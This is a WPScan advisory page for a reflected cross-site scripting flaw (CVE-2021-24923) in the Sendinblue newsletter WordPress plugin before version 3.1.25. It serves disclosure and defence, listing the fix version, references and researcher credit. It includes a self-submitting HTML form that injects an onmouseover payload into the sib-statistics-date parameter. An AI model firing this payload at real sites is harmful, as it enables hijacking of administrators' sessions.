WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.25 - Reflected XSS

Description

The plugin does not escape the sib-statistics-date parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=sib_page_statistics" id="hack" method="POST">
      <input type="hidden" name="sib-statistics-date" value='2021 - 2021 - " onmouseover=alert(/XSS/) style=width:100%;height:3000px test="' />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

mailin
Fixed in version 3.1.25

References

CVE
CVE-2021-24923

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified

Yes

WPVDB ID
3afef591-9e00-4af8-a8a6-e04ec5e61795

Timeline

Publicly Published

2021-12-23 (about 1 years ago)

Added

2021-12-23 (about 1 years ago)

Last Updated

2022-09-26 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin